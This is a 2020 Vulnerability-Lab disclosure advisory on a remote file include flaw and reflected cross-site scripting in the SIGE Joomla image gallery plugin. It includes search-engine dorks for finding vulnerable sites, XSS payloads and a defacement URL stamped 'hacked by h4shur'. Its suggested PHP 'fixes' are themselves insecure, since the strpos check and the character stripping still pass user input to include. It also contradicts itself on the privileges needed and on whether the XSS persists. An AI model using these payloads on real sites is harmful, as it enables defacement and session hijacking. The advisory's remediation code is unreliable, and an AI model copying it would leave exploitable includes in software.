316 lines
No EOL
10 KiB
Text
316 lines
No EOL
10 KiB
Text
# Exploit Title: Joomla Plugin Simple Image Gallery Extended (SIGE) 3.5.3 - Multiple Vulnerabilities
|
|
# Exploit Author: Vulnerability-Lab
|
|
# Date: 2020-11-11
|
|
# Vendor Homepage: https://kubik-rubik.de/sige-simple-image-gallery-extended
|
|
# Software Link: https://kubik-rubik.de/sige-simple-image-gallery-extended
|
|
# Version: 3.5.3
|
|
|
|
Document Title:
|
|
===============
|
|
SIGE (Joomla) 3.4.1 & 3.5.3 Pro - Multiple Vulnerabilities
|
|
|
|
|
|
References (Source):
|
|
====================
|
|
https://www.vulnerability-lab.com/get_content.php?id=2265
|
|
|
|
|
|
Release Date:
|
|
=============
|
|
2020-11-11
|
|
|
|
|
|
Vulnerability Laboratory ID (VL-ID):
|
|
====================================
|
|
2265
|
|
|
|
|
|
Common Vulnerability Scoring System:
|
|
====================================
|
|
7.8
|
|
|
|
|
|
Vulnerability Class:
|
|
====================
|
|
Multiple
|
|
|
|
|
|
Current Estimated Price:
|
|
========================
|
|
2.000€ - 3.000€
|
|
|
|
|
|
Product & Service Introduction:
|
|
===============================
|
|
It offers numerous opportunities to present pictures quickly and easily
|
|
in articles. The unique feature of the plugin is
|
|
that you can control any parameter on the syntax call. Editor Button -
|
|
SIGE Parameters: With the button, you can set the
|
|
parameters very easy on-the-fly in an article. It is an excellent
|
|
addition to SIGE. Highlights are: parameter call, watermark
|
|
function, read IPTC data, thumbnail storage, crop function, sort by
|
|
modification date, output as a list, CSS Image Tooltip,
|
|
Editor Button SIGE Parameter and much more. In version 1.7-2, SIGE was
|
|
rewritten entirely and equipped with numerous innovations.
|
|
The absolute highlight is the turbo mode. This feature doesn't exist in
|
|
any other plugin for Joomla!. In Turbo Mode 2 text files
|
|
are created from the HTML output of the gallery and loaded in successive
|
|
runs. This feature eliminates the tedious editing
|
|
process of each image. In a test with 50 large images, the creation of a
|
|
gallery with all the extra features (save thumbnails,
|
|
watermark generation, resize original images, etc.) without turbo mode
|
|
lasted approximately 17 seconds. In turbo mode, it only
|
|
took 1 second, and the gallery on the same scale was available! For
|
|
calling the syntaxes, additionally, an Editor Button has
|
|
been programmed. It makes it very easy to choose the required syntax,
|
|
showing all the settings and parameters of the plugin.
|
|
It is a great enrichment in using the SIGE plugin.
|
|
|
|
(Copy of the Homepage:
|
|
https://kubik-rubik.de/sige-simple-image-gallery-extended )
|
|
(Software: https://kubik-rubik.de/sige-simple-image-gallery-extended ;
|
|
https://kubik-rubik.de/downloads/sige-simple-image-gallery-extended ;
|
|
https://extensions.joomla.org/extension/photos-a-images/galleries/sige/ )
|
|
|
|
|
|
Abstract Advisory Information:
|
|
==============================
|
|
An independent vulnerability laboratory researcher discovered multiple
|
|
web vulnerabilities in the Simple Image Gallery Extended (SIGE) v3.4.1 &
|
|
v3.5.3 pro extension for joomla.
|
|
|
|
|
|
Affected Product(s):
|
|
====================
|
|
Vendor:
|
|
Product: Simple Image Gallery Extended (SIGE) v3.4.1 & v3.5.3 Pro -
|
|
Joomla Extension (Web-Application)
|
|
|
|
|
|
Vulnerability Disclosure Timeline:
|
|
==================================
|
|
2020-11-10: Researcher Notification & Coordination (Security Researcher)
|
|
2020-11-11: Public Disclosure (Vulnerability Laboratory)
|
|
|
|
|
|
Discovery Status:
|
|
=================
|
|
Published
|
|
|
|
|
|
Exploitation Technique:
|
|
=======================
|
|
Remote
|
|
|
|
|
|
Severity Level:
|
|
===============
|
|
High
|
|
|
|
|
|
Authentication Type:
|
|
====================
|
|
Open Authentication (Anonymous Privileges)
|
|
|
|
|
|
User Interaction:
|
|
=================
|
|
No User Interaction
|
|
|
|
|
|
Disclosure Type:
|
|
================
|
|
Full Disclosure
|
|
|
|
|
|
Technical Details & Description:
|
|
================================
|
|
1.1
|
|
A file include vulnerability has been discovered in the official Simple
|
|
Image Gallery Extended (SIGE) v3.4.1 & v3.5.3 pro extension for joomla.
|
|
The web vulnerability allows remote attackers to unauthorized upload
|
|
web-shells or malicious contents to compromise the local file-system.
|
|
|
|
The vulnerability is located in the img parameter of the print.php file.
|
|
Remote attackers are able to upload images to the unrestricted assets
|
|
path to compromise the web-applications file-system and involved
|
|
database management system. Exploitation requires no user interaction
|
|
and only
|
|
a low privileged user account to upload images.
|
|
|
|
|
|
1.2
|
|
Multiple non-persistent cross site web vulnerabilities has been
|
|
discovered in the official Simple Image Gallery Extended (SIGE) v3.4.1 &
|
|
v3.5.3 pro extension for joomla.
|
|
The vulnerability allows remote attackers to inject own malicious script
|
|
codes with non-persistent attack vector to compromise browser to
|
|
web-application requests from the client-side.
|
|
|
|
The non-persistent cross site scripting web vulnerabilities are located
|
|
in the `name` and `title` parameters of the `print.php` file.
|
|
Remote attackers without user or guest privileges are able to make own
|
|
malicious special crafted links to compromise client-side
|
|
GET method requests. The attack vector is non-persistent and the issue
|
|
affects the client-side.
|
|
|
|
Successful exploitation of the vulnerabilities results in session
|
|
hijacking, non-persistent phishing attacks, non-persistent
|
|
external redirects to malicious source and non-persistent client-side
|
|
manipulation of affected application modules.
|
|
|
|
|
|
Proof of Concept (PoC):
|
|
=======================
|
|
1.1
|
|
The remote file include web vulnerability can be exploited by remote
|
|
attackers without privileged user account or user interaction.
|
|
For security demonstration or to reproduce the persistent cross site web
|
|
vulnerability follow the provided information and steps below to continue.
|
|
|
|
|
|
Dork(s):
|
|
intext:"Powered by Simple Image Gallery Extended"
|
|
intext:"Powered by Simple Image Gallery Extended - Kubik-Rubik.de"
|
|
|
|
|
|
PoC: Exploitation
|
|
http://[SERVER/DOMAIN]/[folders]/print.php?img=[RFI
|
|
VULNERABILITY!]&name=[NAME]%20title=[TITLE]
|
|
|
|
|
|
1.2
|
|
The non-persistent cross site scripting web vulnerability can be
|
|
exploited by remote attackers without privileged user account and with
|
|
low user interaction.
|
|
For security demonstration or to reproduce the persistent cross site web
|
|
vulnerability follow the provided information and steps below to continue.
|
|
|
|
|
|
Dork(s):
|
|
intext:"Powered by Simple Image Gallery Extended"
|
|
intext:"Powered by Simple Image Gallery Extended - Kubik-Rubik.de"
|
|
|
|
|
|
PoC: Payload
|
|
"><svg onload=alert()>
|
|
'><script>alert('');</script>
|
|
<IMG "'"><script>alert()</script>'>
|
|
|
|
PoC: Example
|
|
http://[SERVER/DOMAIN]/[folders]/print.php?img=[IMG]&name=[NON-PERSISTENT XSS]%20title=[TITLE]
|
|
http://[SERVER/DOMAIN]/[folders]/print.php?img=[IMG]&name=[NAME]%20title=[NON-PERSISTENT
|
|
XSS]
|
|
|
|
|
|
PoC: Exploitation
|
|
http://[SERVER/DOMAIN]/oldsite/plugins/content/sige/plugin_sige/print.php
|
|
?img=http://[SERVER/DOMAIN]/assets/public/js/uploading/images/h4shur/h4.gif&name=%22%3E%3Ch1%3Ehacked%20by%20h4shur%3C/h1%3E%22%20title=%22%3E%3Cscript%3Ealert(%27hacked%20by%20h4shur%27)%3C/script%3E
|
|
|
|
|
|
Solution - Fix & Patch:
|
|
=======================
|
|
1.1
|
|
The remote file include vulnerability issue can be resolved by the
|
|
following steps ...
|
|
|
|
Example :
|
|
?php
|
|
$files=array('test.gif');
|
|
if(in_array($_GET['file'], $files)){
|
|
include ($_GET['file']);
|
|
}
|
|
?
|
|
* If you are a server administrator, turn off allow_url_fopen from the file
|
|
|
|
* Or do it with the ini_set command. Only for (RFI)
|
|
?php
|
|
ini_set('allow_url_fopen ', 'Off');
|
|
?
|
|
|
|
* We can use the strpos command to check that if the address is: //
|
|
http, the file will not be enclosed
|
|
?php
|
|
$strpos = strpos($_GET['url'],'http://');
|
|
if(!$strpos){
|
|
include($_GET['url']);
|
|
}
|
|
?
|
|
|
|
* Using str_replace we can give the given address from two characters
|
|
"/", "." Let's clean up
|
|
?php
|
|
$url=$_GET['url'];
|
|
$url = str_replace("/", "", $url);
|
|
$url = str_replace(".", "", $url);
|
|
include($url);
|
|
?
|
|
|
|
|
|
1.2
|
|
The client-side cross site scripting vulnerabilities can be resolved by
|
|
the following steps ...
|
|
1. Encode and escape as parse the name and title parameters
|
|
2. Filter the input for special chars and disallow them in parameters
|
|
|
|
|
|
Security Risk:
|
|
==============
|
|
1.1
|
|
The securit risk of the remote file include vulnerability in the img
|
|
path of the web-application request is estimated as high.
|
|
|
|
1.2
|
|
The security risk of the non-persistent cross site scripting
|
|
vulnerabilities is estimated as medium.
|
|
|
|
|
|
Credits & Authors:
|
|
==================
|
|
h4shursec - https://www.vulnerability-lab.com/show.php?user=h4shursec
|
|
Twitter: @h4shur ; Telegram: @h4shur ; Instagram: @netedit0r
|
|
|
|
|
|
Disclaimer & Information:
|
|
=========================
|
|
The information provided in this advisory is provided as it is without
|
|
any warranty. Vulnerability Lab disclaims all warranties,
|
|
either expressed or implied, including the warranties of merchantability
|
|
and capability for a particular purpose. Vulnerability-Lab
|
|
or its suppliers are not liable in any case of damage, including direct,
|
|
indirect, incidental, consequential loss of business profits
|
|
or special damages, even if Vulnerability-Lab or its suppliers have been
|
|
advised of the possibility of such damages. Some states do
|
|
not allow the exclusion or limitation of liability for consequential or
|
|
incidental damages so the foregoing limitation may not apply.
|
|
We do not approve or encourage anybody to break any licenses, policies,
|
|
deface websites, hack into databases or trade with stolen data.
|
|
|
|
Domains: www.vulnerability-lab.com www.vuln-lab.com
|
|
www.vulnerability-db.com
|
|
Services: magazine.vulnerability-lab.com
|
|
paste.vulnerability-db.com infosec.vulnerability-db.com
|
|
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab
|
|
youtube.com/user/vulnerability0lab
|
|
Feeds: vulnerability-lab.com/rss/rss.php
|
|
vulnerability-lab.com/rss/rss_upcoming.php
|
|
vulnerability-lab.com/rss/rss_news.php
|
|
Programs: vulnerability-lab.com/submit.php
|
|
vulnerability-lab.com/register.php
|
|
vulnerability-lab.com/list-of-bug-bounty-programs.php
|
|
|
|
Any modified copy or reproduction, including partially usages, of this
|
|
file requires authorization from Vulnerability Laboratory.
|
|
Permission to electronically redistribute this alert in its unmodified
|
|
form is granted. All other rights, including the use of other
|
|
media, are reserved by Vulnerability-Lab Research Team or its suppliers.
|
|
All pictures, texts, advisories, source code, videos and other
|
|
information on this website is trademark of vulnerability-lab team & the
|
|
specific authors or managers. To record, list, modify, use or
|
|
edit our material contact (admin@ or research@) to get a ask permission.
|
|
|
|
Copyright © 2020 | Vulnerability Laboratory - [Evolution
|
|
Security GmbH]™
|
|
--
|
|
VULNERABILITY LABORATORY - RESEARCH TEAM
|
|
SERVICE: www.vulnerability-lab.com |